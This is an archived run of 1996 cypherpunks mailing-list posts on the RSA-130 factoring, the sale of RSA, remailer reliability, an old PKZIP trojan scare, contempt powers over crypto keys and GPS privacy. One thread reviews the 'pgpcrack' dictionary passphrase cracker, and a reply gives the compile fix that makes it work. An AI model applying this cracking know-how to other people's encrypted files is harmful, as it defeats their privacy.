`
end

- -----End Forwarded Message-----

- -- 
Clemens Stiglechner

a9401816@unet.univie.ac.at     compuserve: 100725,3222

0xE7A9BDE5                 1024 bit - 1996/03/28
99 EC A6 35 0F 85 4D 0D  14 BA 81 D5 71 37 F8 8A

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMXFzouKiyjznqb3lAQEWpQP/bJ01LVanoLiRAUlotLK2O9zxuN06TAZ9
n4FkJWN7dDcXAPLrlrgVlh//0sUnpgmGYeaP0+jrySv6OchtqGaRg6wlqvIIML6+
M+uxz9ntq1/AtEWEmRoYzI/PaPSWg9LtSGZotRukpXen47mKuQGqXvrusy/zbgzH
x9g0ztmOeNM=
=/o0z
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Mon, 15 Apr 1996 15:26:23 +0800
To: a9401816@unet.univie.ac.at
Subject: Re: [fwd] Undeliverable Message
In-Reply-To: <3171755D.5A09@unet.univie.ac.at>
Message-ID: <9604150435.AA4358@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Clemens Stiglechner <a9401816@unet.univie.ac.at> writes:
  > ... 64 *different* *encrypted* messages... Here is the first one:

  > begin 600 attach.Z

Huh -- *what* encrypted message?  As the header implies, attach.Z is a
very ordinary uuencoded compressed ASCII text attachment (full of
"VNM3043 -- MAILBOX IS FULL" messages).

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Mon, 15 Apr 1996 19:36:16 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604150622.XAA07542@netcom4.netcom.com>
Message-ID: <199604150751.AAA06516@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



mpd@netcom.com (Mike Duvos) writes:
>one?  Also, a ballpark guess of how this result extrapolates to
>the MIPS years required to factor a 512 bit PGP key would
>probably be of interest to all.

I don't have a good guess for this, but Arjen did say that the cost to
break RSA-130 was a fraction of what it cost to break RSA-129 because
of the improved algorithm, so I'd guess we'll find out soon.  The next
target of the consortium is planned to be RSA-155, I believe, which is
above 512 bits; that means skipping RSA-140 to go for the one with the
higher psychological value.  While 512-bit PGP keys are interesting to
Cypherpunks, other 512-bit RSA keys are vitally important to some banks.

	Jim Gillogly
	Trewesday, 25 Astron S.R. 1996, 07:50




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <timd@consensus.com>
Date: Mon, 15 Apr 1996 19:59:11 +0800
To: cypherpunks@toad.com
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
Message-ID: <v02140b00ad97b6a6eca6@[205.149.165.24]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:51 AM 4/15/96, Jim Gillogly wrote:
>mpd@netcom.com (Mike Duvos) writes:
>>one?  Also, a ballpark guess of how this result extrapolates to
>>the MIPS years required to factor a 512 bit PGP key would
>>probably be of interest to all.
>
>I don't have a good guess for this, but Arjen did say that the cost to
>break RSA-130 was a fraction of what it cost to break RSA-129 because
>of the improved algorithm, so I'd guess we'll find out soon.  The next
>target of the consortium is planned to be RSA-155, I believe, which is
>above 512 bits; that means skipping RSA-140 to go for the one with the
>higher psychological value.  While 512-bit PGP keys are interesting to
>Cypherpunks, other 512-bit RSA keys are vitally important to some banks.

Also, note that 512 bits is the current exportable limit for RSA encryption.

 - Tim

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 15 Apr 1996 21:21:19 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: RSA-130 Falls to NFS - Lenstra Posting to sci.crypt.research
In-Reply-To: <199604150519.WAA09619@toad.com>
Message-ID: <Pine.SUN.3.91.960415025411.19675R-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



Excellent work!


---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 15 Apr 1996 18:59:24 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [Political Rant] Was: examples of mandatory content rating?
Message-ID: <v02140b04ad97a0080cf4@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:52 4/14/96, E. ALLEN SMITH wrote:

>I'm not sure if the major use for ratings may not be searching for
>material that the raters don't like. I'd be interested in many things the
>fundys don't like, for instance. One could even do this via one of the
>"services" that mails out listings of places to be locked from kids - just
>sign up one of your anonymous employees, and get the data and put it on your
>anonymous web access site. Doing so - if you don't admit you've done it - may
>be cheaper than doing the research yourself. Of course, you'll need to check
>out each such site to make sure that it isn't a decoy that they've inserted.


When you do the checking, make sure it is from an IPN that does not point
back at you (or at least only points to a Server Supplied not a Dedicated
IPN). You might also want to watch out for "Canary Trap" Decoys (where each
list has an unique set of Decoys [or at least one unique Decoy] so they can
tell which copy was compromised). I'm assuming that the Decoy is a "valid"
[possibly virtual] domain address which is being logged.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mhinze@why.net (Matt Hinze)
Date: Mon, 15 Apr 1996 15:29:16 +0800
To: olbon@dynetics.com (Clay Olbon II)
Subject: Re: [NOISE] Consolidation of threads ...
In-Reply-To: <v01540b0cad96f6491958@[193.239.225.200]>
Message-ID: <3171ce98.12537811@why.net>
MIME-Version: 1.0
Content-Type: text/plain


>OK, I have a proposal that consolidates two threads that have been
>discussed recently.  How about proposing legislation that mandates that a
>byte is now 9 bits instead of 8.  This would allow the ninth bit to be the
>decent/indecent bit, thereby solving all of our problems.

The question of decency is still a fundamental problem.  What is
decent? What is indecent?  Who decides?

Plus, wouldn't it be difficult to *legislate* an additional bit?   How
would one implement that into transfer protocols and the like?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bugs@netcom.com (Mark Hittinger)
Date: Tue, 16 Apr 1996 01:55:16 +0800
To: cypherpunks@toad.com
Subject: security dynamics buys pkp?
Message-ID: <199604151344.GAA04748@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



As I was trying to wake up this morning I heard an announcement on CNBC that
Security Dynamics purchased the RSA guys.  It was evidently a stock swap and
not a cash deal (interesting).

Later

Mark Hittinger
Netcom/Dallas
bugs@freebsd.netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 15 Apr 1996 22:39:03 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: pgpcrack review [failed]
Message-ID: <Pine.SUN.3.91.960415010258.19675P-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



I complied pgpcrack (which was on the list a few days ago) on a 
SPARCstation-10 running SunOS 4.1.4.

Running pgpcrack on a -c encrypted file (duress.pgp) encrypted with the 
passphrase "lover" (which is in my dictionary file) results in the 
following output after under 1 second.  (The dictionary file I was using 
is about 250k):

PGPCrack passphrase: cruddy

Using the same plaintext encrypted with "pain" the following output after 
3 seconds or so:

PGPCrack passphrase: promulgate

A third time, same plaintest -c'd with "avoid" results in:

PGPCrack passphrase: cerebral

Seems to work just fine on linux.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 16 Apr 1996 02:20:06 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199604151350.GAA04644@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.alias.net> alpha pgp';
$remailer{'cubed'} = '<alias@alias.alias.net> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@gate.net> mix cpunk latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono nymrod)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 15 Apr 96 6:47:58 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     -++++------   2:33:23  99.98%
exon     remailer@remailer.nl.com         +***+*+++***     5:41  99.98%
portal   hfinney@shell.portal.com         ####+*####*#     1:58  99.96%
amnesia  amnesia@chardos.connix.com       -++-----+---  2:32:50  99.96%
vishnu   mixmaster@vishnu.alias.net       --.-*.-*++**  2:41:08  99.95%
treehole remailer@mockingbird.alias.net   -..-+.---+-+  4:27:26  99.93%
ecafe    cpunk@remail.ecafe.org           #+####**+--*  1:08:04  99.93%
vegas    remailer@vegas.gateway.com       -***-..+*##*  2:28:26  99.89%
ncognito ncognito@gate.net                **#*##+ *###      :59  99.81%
alpha    alias@alpha.c2.org               ++++++++ *+*    41:19  99.74%
shinobi  remailer@shinobi.alias.net       +-.--*-+*# +  1:08:56  99.52%
alumni   hal@alumni.caltech.edu           # ##+#* ## *     6:51  99.41%
c2       remail@c2.org                    ++++++++++++    45:38  99.31%
hacktic  remailer@utopia.hacktic.nl       **** +**+* +    11:03  98.93%
nymrod   nymrod@nym.alias.net             --. *-+**+**  1:55:40  98.91%
extropia remail@miron.vip.best.com        ---.------    5:38:19  98.22%
penet    anon@anon.penet.fi               -.--.__-_    32:46:03  97.87%
replay   remailer@replay.com              -***  **+*      10:15  97.83%
haystack haystack@holy.cow.net            -##  ++#*#++    12:46  95.67%
cubed    alias@alias.alias.net            ********* +*    18:13  95.06%
spook    remailer@spook.alias.net         +*****+++ **    29:30  94.97%
flame    remailer@flame.alias.net         ----------    3:57:11  94.82%
lead     mix@zifi.genetics.utah.edu        +++++++++++    41:35  93.39%
nemesis  remailer@meaning.com                           2:39:59   1.03%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Mon, 15 Apr 1996 08:35:32 +0800
To: markm@voicenet.com (Mark M.)
Subject: Re: key bit lengths
In-Reply-To: <Pine.LNX.3.92.960414141633.893A-100000@gak>
Message-ID: <199604142137.HAA05553@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> so a brute force attack might take much less energy several billion years
> hence, since the universe will cooled off more.

Proportionally to the amount of energy available in the universe to conduct
such an attack however. You have to get it from somewhere.

-- 
"I mean, after all;  you have to consider we're only made out of dust.  That's
 admittedly not  much  to  go  on  and  we  shouldn't  forget  that.  But even
 considering, I mean it's sort of a bad beginning, we're not doing too bad. So
 I personally have faith that even in this lousy situation we're faced with we
 can make it. You get me?" - Leo Bulero/PKD
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Tue, 16 Apr 1996 02:54:33 +0800
To: "'jya@pipeline.com>
Subject: FIX_rsa
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960415150036Z-56244@red-05-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 16 Apr 1996 03:03:51 +0800
To: cypherpunks@toad.com
Subject: Old Trojan news [Re: Trojan Horse Loose On The Internet]
In-Reply-To: <19960415073947953.AAA74@Executioner.utm.my>
Message-ID: <199604151515.IAA07048@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



wolv@infosys.utm.my (Ramli Bin Jaafar) writes:
>According to several reliable sources there is a deadly virus on the
>Internet.  This is NOT a hoax! 
>CAN ANYBODY CHECK THIS OUT, PLEASE..

>Note: The reliability of all information below is UNKNOWN.

Uhh -- then perhaps you should check it out before doing the alarmist
number.  Appropriate places are the VIRUS-L mailing list or comp.virus...
or the VIRUSPUNKS list, if you can find the right majordomo.

>WHAT:
>Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet

This trojan was constructed a couple of years ago, and the warning report
goes around every few months; we're currently in the middle of another
resurgence.  It's like the Good Times Virus, except that there really is
a trojanized PKZIP... but I haven't seen a confirmed sighting of it or
a report of somebody actually being bitten for many yonks now.

There are plenty of current and active viruses and trojan horses, and some
crypto relevance with some of them (e.g. KOH and encrypting viruses)... but
this isn't one of them.

	Jim Gillogly
	Trewesday, 25 Astron S.R. 1996, 15:13




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 16 Apr 1996 03:13:33 +0800
To: cypherpunks@toad.com
Subject: Re: Trojan Horse Loose On The Internet
Message-ID: <2.2.32.19960415152907.00a5b394@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 4/15/96 +0800, Ramli Bin Jaafar wrote:
>According to several reliable sources there is a deadly virus on the
>Internet.  This is NOT a hoax! 
>CAN ANYBODY CHECK THIS OUT, PLEASE..
>
>Note: The reliability of all information below is UNKNOWN.
>     
>WHAT:
>Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet

Not again!

There is a trojan that claims to be a new version of PKZip.  (Actually there
is a long list of them.)  The program you are refering to here is about
three years old or more!  Some of them destroy hard drives, some of them do
not.  (One I have seen is pretty buggy.) 

The reasons these warnings have started to crop up again is that the program
was sighted by someone who did not remember the last go around with these
trojans and wrote a panic type broadsheet.  The posting is now curculating
on every newsgroup and mailing list on the planet.  (At least once.)  I
expect that it has attained "The Shergold Effect" and taken on a life of its
own.

As for the data on the released versions of PKZip, there is a Windows
version (2.01 I think) that you do not have listed and is available from the
PKWare site.  There are also non-pkware unzippers that are not trojans.
(Translated over from the Unix world.  They are useful for handling long
file names. (Something the PKWare version does not always do gracefully.))

Facts are useful, but the panic style of the warnings on this problem make
things worse, not better.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Tue, 16 Apr 1996 01:55:55 +0800
To: cypherpunks@toad.com
Subject: Re[2]: What backs up digital money?
Message-ID: <9603158295.AA829582357@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          CANCEL SUBSCRIPTION





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Tue, 16 Apr 1996 03:49:16 +0800
To: cypherpunks@toad.com
Subject: GPS privacy/ECM
Message-ID: <199604151548.IAA19700@well.com>
MIME-Version: 1.0
Content-Type: text/plain



I have been following the recent discussion on Denning's GPS I.D.
plan and had some thoughts:

I wonder what the pro-govt anti-privacy types would do if some
obnoxious group started publishing a list with the home/work GPS of
say various congresspersons/senatepersons?

Since cruise missile's already use GPS to find/destroy their
target, how long do you figure before some terrorist group use's
this ever cheaper tech to trigger one of it's devices?

<car bombs, the poor man's air force>

What defences are there? Just how small/inexpensive could a home
GPS/ECM system be?

Personnel dithering? Locally transmitting your own public key
encrypted location.

This is thoughtfood only.

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Tue, 16 Apr 1996 02:24:31 +0800
To: wolv@infosys.utm.my
Subject: Re: Trojan Horse Loose On The Internet
In-Reply-To: <19960415073947953.AAA74@Executioner.utm.my>
Message-ID: <doug-9603151349.AA0273400@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>According to several reliable sources there is a deadly virus on the
>Internet.  This is NOT a hoax! 
>CAN ANYBODY CHECK THIS OUT, PLEASE..
>
>Note: The reliability of all information below is UNKNOWN.
>     
>WHAT:
>Virus Alert:  PKZIP 3.0 Trojan Loose on the Internet
>    
>BACKGROUND:
>A trojan (virus) program, PKZIP 3.0, which is advertised as an updated
>version of the popular compression utility PKZIP, is currently being
>distributed on the Internet.  Please note that this trojan is REAL and
>DESTRUCTIVE.  Once executed, this program will destroy data on your hard
>drive; there's no stopping it.
>
>According to PKWARE, makers of PKZIP, the only released versions of PKZIP
>are:  1.10, 1.93, 2.04c, 2.04e and 2.04g.  All other versions currently
>circulating on the Internet are suspect and should not be used.
>
>ACTION REQUIRED:
>Please do not download or execute any files that are named PKZ300B.EXE,
>PKZ300B.ZIP, PKZIP300.ZIP, PKZIP300.EXE, etc. from the Internet or other
>external source.
>
>Anybody with any information on this..??

100% true and verifiable. Although I wouldn't call it deadly or rampant, 
it has been making the rounds of late. Mostly it's victims are new users.
After all, how many times have you upgraded your copy of pkzip? ;)

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 16 Apr 1996 02:00:39 +0800
To: cypherpunks@toad.com
Subject: FIX_rsa
Message-ID: <199604151351.JAA23246@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-15-96, W$U:

   "RSA Data May Be Sold in Stock Deal."

   Security Dynamics Technolgies, Inc. is in talks to buy
   closely held RSA Data Security Inc., the dominant supplier
   of privacy technology for the Internet, for stock valued at
   about $200 million.

   Industry executives said Security Dynamics may hope to
   combine its proprietary technology with standard encryption
   software from RSA, which could yield products that can be
   used with a broader array of computer products.

   Some of RSA's partners may be taken aback, since few are
   familiar with relatively obscure Security Dynamics.

   The largest single RSA shareholder is Addison Fischer,
   founder of a Florida security-products concern called
   Fischer International.

   FIX_rsa







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 16 Apr 1996 06:03:54 +0800
To: unicorn@schloss.li
Subject: Re:  What can the judge do to me?
Message-ID: <199604151721.KAA03490@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Black Unicorn <unicorn@schloss.li>
> I've been involved in a private discussion with a list reader about 
> the extent to which courts can impose contempt fines and sanctions.  I 
> thought I would post the results to the list as many have expressed 
> interest in the ways that courts might try to compel production of 
> crypto keys or compel offshore e-cash institutions.  The bulk of my 
> answer follows.

I thought this was very interesting and I appreciate Unicorn taking the
time to lend us his expertise.

> The key to limiting the ability of a court to summarily enter contempt 
> sanctions has always been the classification of the sanctions.  
> "Criminal" sanctions, may entitle the witness to a trial by jury.
> [...]
> "Civil" sanctions do 
> not require such protections and can be imposed on the spot and 
> without review.

I didn't understand what distinguishes civil and criminal sanctions.  Is
it the nature of the proceedings, whether it is a civil or criminal case
that is before the judge?  Or is it the nature of the contempt charge
itself, where not doing what the judge wants, in broad terms, is civil
contempt?  And in that case, what would be criminal contempt?

> The court makes a point to justify severe sanctions where testimony is 
> sought, or the proceedings are threatened.  "The necessity 
> justification for the contempt authority is at its pinnacle, of 
> course, where contumacious conduct threatens a court's immediate 
> ability to conduct its proceedings, such as where a witness refuses to 
> testify, or a party disrupts the court... [t]hus, petty, direct 
> contempts in the presence of the court traditionally have been subject 
> to summary adjudication, 'to maintain order in the courtroom and the 
> integrity of the trial process in the face of an 'actual obstruction 
> of justice.'"  International Union, supra (quoting Codispoti v. 
> Pennsylvania, 418 U.S., at 513 and citing numerous other sources).

Would there be a distinction between contempt by a witness and that by
the defendant (in a criminal case)?  I could see justification for
attempting to compel testimony from a witness who can shed needed light
on guilt or innocence in the case.  A man's freedom or perhaps his very
life is at stake.  But it seems to be another matter to compel the
defendant himself to provide some information which will be detrimental
to himself.

The defendant has some Fifth Amendment rights, but for those cases
where what he is ordered to do has been found not to be protected by
the Fifth Amendment it still seems bizarre to imagine him jailed for
contempt if he refuses.  Are there precedents for holding a defendant in
contempt for standing mute at his own trial?

(Part of my problem with this scenario is my sense that despite gradual
erosion of the rights against self incrimination, verbally revealing a
pass phrase which will unlock an encrypted document seems like
testimony, and something which should be protected.  Is there such a
difference between "Reveal the pass phrase" and "Reveal what you did with
the knife", if the judge doesn't believe the denials of the ability to
comply?)

> Most interesting to the crypto crowd:
> 
> "Contempts such as failure to comply with document discovery, for 
> example, while occurring outside the court's presence, impede the 
> court's ability to adjudicate the proceedings before it and thus touch 
> upon the core justification for the contempt power....  Similarly, 
> indirect contempts involving discrete, readily ascertainable acts, 
> _such as turning over a key_ or payment of a judgment, properly may be 
> adjudicated through civil proceedings since the need for extensive, 
> impartial fact-finding is less pressing."  International Union, supra 
> (emphasis added).

I would guess that "turning over a key" here refers not to production to
the court by rather to passing a physical key between two contesting
parties, say a seller and buyer of some property that the key gives
access to.  The phrase "turning over" rather than "production of" suggests
this interpretation.  So this sounds like something which would be more
likely to occur in a civil proceeding than a criminal one.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 16 Apr 1996 06:44:39 +0800
To: cypherpunks@toad.com
Subject: on corporations and subpoenas
Message-ID: <199604151800.LAA06083@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Suppose a corporation has multiple subsidiaries.

	Would a subpoena served on the parent corp be binding on the
subsidiaries?

	Or would the better way to handle this be to create spinoff
corporations rather than subsidiaries?

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Tue, 16 Apr 1996 03:16:16 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: pgpcrack review [failed]
In-Reply-To: <Pine.SUN.3.91.960415010258.19675P-100000@polaris.mindport.net>
Message-ID: <199604151501.LAA06984@fuseki.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


You need to #define HIGHFIRST for idea.c & md5.c on big-endian
architectures. It worked after I did this.

michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Tue, 16 Apr 1996 04:50:16 +0800
To: Brian D Williams <talon57@well.com>
Subject: Re: GPS privacy/ECM
In-Reply-To: <199604151548.IAA19700@well.com>
Message-ID: <Pine.3.89.9604151139.C19977-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Apr 1996, Brian D Williams wrote:

> What defences are there? Just how small/inexpensive could a home
> GPS/ECM system be?

The portable handheld GPS receivers are well under $300.  I've seen a 
couple under $200.

Clinton is supposed to have either turned off dithering or will soon 
(crossing fingers).  Dithering is a real nuisance at times...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 16 Apr 1996 03:03:58 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: rsa bought!!! [fwd]
